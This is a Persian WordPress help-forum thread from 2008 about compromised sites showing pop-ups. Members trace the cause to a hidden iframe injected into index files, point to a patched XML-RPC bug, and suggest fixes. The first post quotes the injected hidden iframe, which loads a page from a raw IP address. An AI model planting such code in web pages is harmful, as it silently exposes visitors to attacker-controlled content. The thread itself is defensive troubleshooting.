انجمن


مشکل جدید و واقعاً باورنکردنی در وردپرس  (۲۲ نوشته)

  • ahmad1369

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۸
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۳ فروردین ۱۳۸۷ - ۲۳:۴۹

    با سلام.
    یه چند روزی هست که به یه مشکل باورنکردنی برخورد کرده ام :
    باز شدن پنجره های پاپ آپ به صورت خودکار و ورود به سایت های مختلف

    قابل ذکر است که بنده در این چند روز هیچ تغییری در سایت ایجاد نکرده و یا پلاگین جدیدی نصب نکرده ام که بتواند چنین مشکلی ایجاد کند ، این مشکل را قبلا خودم در یک سایت وردپرسی دیگر دیده بودم.
    آدرس سایت بنده : http://www.persiandownload.ir
    لطفا راهنمایی کنید. ممنون
    پانوشت : احساس کردم این خطوط به ایندکس قالب من اضافه شده که هر کاری میکنم حذف هم نمی شود :
    <iframe src='http://209.200.254.39/1.html' width='1' height='1' style='visibility: hidden;'></iframe>

  • گناهکار

    آفلاین
    کلیددار
    تعداد نوشته‌ها: ۳۵۳۵
    تشکر شده: ۲۵۴۴ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۴ فروردین ۱۳۸۷ - ۰۰:۲۰

    فکر نمی‌کنم ربطی به وردپرس داشته باشه٬ کد جاوا اسکریپتی چیزی اضافه کردی؟

  • navid

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۲۷۱۸
    تشکر شده: ۲۹۸ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۴ فروردین ۱۳۸۷ - ۰۰:۲۹

    http://forum.wp-persian.com/topic/1037?replies=24#post-8877

  • ahmad1369

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۸
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۴ فروردین ۱۳۸۷ - ۰۰:۵۳

    Gonahkar گفت:
    فکر نمی‌کنم ربطی به وردپرس داشته باشه٬ کد جاوا اسکریپتی چیزی اضافه کردی؟

    عزیز من میگم دست به سیاه سفید نزدم ، کد جاوا چیه. نه کاری نکردم!

  • ahmad1369

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۸
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۴ فروردین ۱۳۸۷ - ۰۰:۵۷

    navid گفت:
    http://forum.wp-persian.com/topic/1037?replies=24#post-8877

    اون کد ها هم حذف کردم. مشکلم حل نشد.
    خیلی خطریه ! چی کار کنم ؟

  • navid

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۲۷۱۸
    تشکر شده: ۲۹۸ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۶ فروردین ۱۳۸۷ - ۱۸:۰۲

    همه رو عمل کردید ؟ اگه بازم مشکل هست آدرس بدید

  • Rahgozar

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۳۱
    تشکر شده: ۱۰ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۶ فروردین ۱۳۸۷ - ۲۳:۱۴

    منم جدیدا همچین مشکلی برام پیش اومده یه صفحه باز میشه بصورت پاپ اپ و میره تو سایت های تبلیغاتی مثل
    green card , diino وردپرس را هم به 2.5 آپگرید کردم اما هیچ تغییری حاصل نشد.

  • navid

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۲۷۱۸
    تشکر شده: ۲۹۸ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۷ فروردین ۱۳۸۷ - ۲۱:۱۲

    باید ببینید کدها کجا میاد برید پاکشون کنید. منم مشکل مشابه داشتم که با تعویض رمزعبور هاست مشکلش حل شد !

  • ahmad1369

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۸
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۹ فروردین ۱۳۸۷ - ۱۱:۲۷

    مشکل حل شد ، در تمامی فایل های index در کلیه پوشه ها اون کد iframe اضافه شده بود (چه جوری اضافه شده الله اعلم) که باید اونا را حذف کنیم تا مشکل حل بشه. ;-]

  • Rahgozar

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۳۱
    تشکر شده: ۱۰ بار
    # نوشته شده: ۱۱ سال پیش
    ۹ اردیبهشت ۱۳۸۷ - ۱۵:۰۲

    مشکل منم حل شد اشکال دقیقا از همون کد iframe بود

  • enigma2

    آفلاین
    عضو
    تعداد نوشته‌ها: ۴۸
    تشکر شده: ۱۰ بار
    # نوشته شده: ۱۱ سال پیش
    ۹ اردیبهشت ۱۳۸۷ - ۱۶:۱۰

    دوستان من هم این مشکل را دارم
    ظاهارا از نسخه خود ورد پرس است الان اومدم رو 2.5.1 ببینم باز هم اینطوری میشه یا نه

  • مهدی شریف

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۵
    تشکر شده: ۳۳ بار
    # نوشته شده: ۱۱ سال پیش
    ۹ اردیبهشت ۱۳۸۷ - ۲۲:۴۲

    این احتمالا یه باگ امنیتی تو پرس هست که به جفنگ ها اجازه ایجاد iframe تو قالب سایت میده :-?

  • amirabbas

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱
    # نوشته شده: ۱۱ سال پیش
    ۱۲ اردیبهشت ۱۳۸۷ - ۱۸:۰۶

    این یه حفره امنیتی هستش که به نظر تو تمامی نسخه ها موجوده حتی نسخه جدید
    این بحث در خود سایت ورد پرس هستش

    http://wordpress.org/support/topic/134928

    این هم تیکتی هست که برای حل مشکل تو ورد پرس زدن

    http://trac.wordpress.org/ticket/5313

    راه حل موقتش هم اینه که یا ثبت نام تو ورد پرس رو غیر فعال کنید یا فایل XMLRPC.php رو از روی سرور حذف کنید یا اسمش رو عوض کنید

  • navid

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۲۷۱۸
    تشکر شده: ۲۹۸ بار
    # نوشته شده: ۱۱ سال پیش
    ۱۲ اردیبهشت ۱۳۸۷ - ۲۰:۲۳

    amirabbas گفت:
    این یه حفره امنیتی هستش که به نظر تو تمامی نسخه ها موجوده حتی نسخه جدید
    این بحث در خود سایت ورد پرس هستش
    http://wordpress.org/support/topic/134928
    این هم تیکتی هست که برای حل مشکل تو ورد پرس زدن
    http://trac.wordpress.org/ticket/5313
    راه حل موقتش هم اینه که یا ثبت نام تو ورد پرس رو غیر فعال کنید یا فایل XMLRPC.php رو از روی سرور حذف کنید یا اسمش رو عوض کنید

    Ticket #5313 (closed defect: fixed)
    این باگ رفع شده. البته ظاهرا برای ۲.۳.۴ که هنوز منتشر نشده حل شده. از همون پچ ها می شه برای رفع باگ اقدام کرد.
    حالا نمی دونم روی نسخه ۲.۵ هم این مشکل هست یا نه. چراکه میل استونش روی ۲.۳ هست و باگ ۱۰ روز پیش بطور کامل رفع شده و اگر قرار بود که نسخه ۲.۵ مشکل داشت الان باید تو ۲.۵.۱ این مشکل وجود نداشته باشه ...
    ;-)

  • Farid

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۱
    # نوشته شده: ۱۱ سال پیش
    ۳۰ اردیبهشت ۱۳۸۷ - ۱۶:۱۳

    من دقیقا همین مشکلو دارم باسایتم صفحه های جداگانه باز میشه ! یه سایت وردپرسی دیگه رو هم دیدم همین مشکل داشت!!!
    لطفا راهنمایی بفرمایید

  • shahvar

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۶۶
    تشکر شده: ۲۱ بار
    # نوشته شده: ۱۱ سال پیش
    ۳۰ اردیبهشت ۱۳۸۷ - ۲۳:۴۶

    ديگه چه راهنمايي مي خواهيد ؟ :O

    يه نگاه به پست بالاتر خود بندازيد !

  • Farid

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۱
    # نوشته شده: ۱۱ سال پیش
    ۳۱ اردیبهشت ۱۳۸۷ - ۱۲:۲۷

    والا اینجا هر کی یه حرفی زده ! آدم نمیدونه چه کار کنه از طرف دیگه این یه مشکله خیلی اساسیه !!!

  • enigma2

    آفلاین
    عضو
    تعداد نوشته‌ها: ۴۸
    تشکر شده: ۱۰ بار
    # نوشته شده: ۱۱ سال پیش
    ۳۱ اردیبهشت ۱۳۸۷ - ۱۹:۱۶

    اپدیت کن به 2.5.1 مشکل حل میشه
    مشکل من که حل شده

  • Farid

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۱
    # نوشته شده: ۱۱ سال پیش
    ۳۱ اردیبهشت ۱۳۸۷ - ۲۲:۲۱

    من الان چند سایت دارم .همه را به 2.5.1 آپگرید کردم اما هنوز مشکل هست که هست ! حتی اون فایل رو هم رینیم کردم
    هیچ فریمی در سایتم نیست !

  • enigma2

    آفلاین
    عضو
    تعداد نوشته‌ها: ۴۸
    تشکر شده: ۱۰ بار
    # نوشته شده: ۱۱ سال پیش
    ۳۱ اردیبهشت ۱۳۸۷ - ۲۲:۳۷

    برای این که شما صفحه اول index.php قالبت را حتما ویرایش نکردی از کد iframe

    زمانی که حمله میشه که ظاهرا با یک برنامه بوده ان برنامه تمام index.php در تمامی پوشه را مورد حمله قرار داده

    1 - تمام index.php را ادیت کن از اون کد
    2 - پسوردت را هم عوض کن

    http://www.eternal-king.com/
    این هم سایت خودم هست و مشکلم حل شده اگر واقعا مشکل ادامه داشت شک نکن که ما جز اولین سایت هایی بودیم که مورد حمله قرار می گرفیتم چون ما 3 ماه پیش مورد حمله قرار گرفتیم و امروز بعد از گذشت چند ماه دیگران هم متوجه شده اند

  • حمید

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۷
    تشکر شده: ۲۸ بار
    # نوشته شده: ۹ سال پیش
    ۳ اسفند ۱۳۸۸ - ۱۳:۱۶

    یه دلیل دیگه هم بجز تمامی دلایلی که شما گفتید وجود داره و اون هم وجود بعضی کدهای مفید برای سایت هست که شما به سایت اضافه می کنید. من اینو از روی تجربه ای که داشتم می گم و فقط به این مورد برخورد کردم:

    motigo.com
    اگر از شمارنده این سایت یا سایر خدماتش استفاده می کنید برای اولین بازدید از هر بازدید کننده جدید یکه پاپ آپ از سایتتونمیزنه بیرون !!
    سایت های دیگه رو نمیدونم ولی چند ماه پیش مطمئنم این سایت باعث بروز مشکل شده بود که با حذف کد شمارنده اون مشکل حل شد.

  • امین

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۴۷
    تشکر شده: ۶۴ بار
    # نوشته شده: ۹ سال پیش
    ۳ اسفند ۱۳۸۸ - ۱۴:۴۷

    سلام عزیز
    میبخشی ها ولی این تاپیک مال 1 سال بلکه قبل تر هستش
    البته اون نکته ای که ذکر کردید مفیده
    موفق باشید

درباره‌ی این موضوع



برچسب‌ها

هیچ برچسبی نیست.